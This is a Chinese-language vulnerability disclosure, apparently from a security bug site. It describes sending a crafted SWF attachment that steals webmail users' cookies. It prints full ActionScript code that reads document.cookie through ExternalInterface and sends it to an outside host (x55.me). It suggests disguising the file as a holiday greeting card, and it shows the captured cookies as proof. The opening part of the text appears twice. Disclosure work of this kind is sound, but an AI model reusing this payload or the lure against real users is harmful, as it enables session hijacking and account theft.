### 简要描述: 设计错误导致可执行恶意JavaScript代码并窃取用户cookies ### 详细说明: 将特制的swf文件作为附件发送给受害者(这里可以选择在过节的时候下手,比如将文件名改称新年贺卡.swf): swf文件的AS代码如下(将就着看吧,东拼西凑整出来的): [<img src="https://images.seebug.org/upload/201407/2315443934ea294aa78f284b9d06dc229bca3ca3.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/2315443934ea294aa78f284b9d06dc229bca3ca3.jpg) ``` package { import flash.external.ExternalInterface; import flash.display.Sprite; import flash.display.Sprite; import flash.events.Event; import flash.net.URLLoader; import flash.net.URLRequest; import flash.text.TextField; import flash.text.TextFieldAutoSize; import flash.xml.*; import flash.events.IOErrorEvent; import flash.events.*; import flash.net.*; /** * @author User */ public class csrf extends Sprite { private var loader:URLLoader; public function csrf() { var res:String = ExternalInterface.call("function(){return document.cookie;}"); doGet(res); } private function doGet(res:String):void{...
### 简要描述: 设计错误导致可执行恶意JavaScript代码并窃取用户cookies ### 详细说明: 将特制的swf文件作为附件发送给受害者(这里可以选择在过节的时候下手,比如将文件名改称新年贺卡.swf): swf文件的AS代码如下(将就着看吧,东拼西凑整出来的): [<img src="https://images.seebug.org/upload/201407/2315443934ea294aa78f284b9d06dc229bca3ca3.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/2315443934ea294aa78f284b9d06dc229bca3ca3.jpg) ``` package { import flash.external.ExternalInterface; import flash.display.Sprite; import flash.display.Sprite; import flash.events.Event; import flash.net.URLLoader; import flash.net.URLRequest; import flash.text.TextField; import flash.text.TextFieldAutoSize; import flash.xml.*; import flash.events.IOErrorEvent; import flash.events.*; import flash.net.*; /** * @author User */ public class csrf extends Sprite { private var loader:URLLoader; public function csrf() { var res:String = ExternalInterface.call("function(){return document.cookie;}"); doGet(res); } private function doGet(res:String):void{ loader = new URLLoader(); var target:String = "http://x55.me/geo.php?get="+res; var request:URLRequest = new URLRequest(target); try { loader.load(request); } catch (error:Error) { sendDatatoJS("Error: " + error.getStackTrace()); } } private function sendDatatoJS(data:String):void{ trace(data); ExternalInterface.call("colsole.log", data); } } } ``` 受害者打开附件里的swf文件: [<img src="https://images.seebug.org/upload/201407/2315445680e1d8b6f2a3d09d0dec0bc53ae47d45.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/2315445680e1d8b6f2a3d09d0dec0bc53ae47d45.jpg) 一旦受害者打开附件里的swf文件,其cookies就会发送到攻击者的站点: [<img src="https://images.seebug.org/upload/201407/231545137642292a572d10c9e018cfc65ff559b0.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/231545137642292a572d10c9e018cfc65ff559b0.jpg) ### 漏洞证明: 附上收到的cookies: [<img src="https://images.seebug.org/upload/201407/231545289127af6eb803867db7db641c101c1973.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/231545289127af6eb803867db7db641c101c1973.jpg)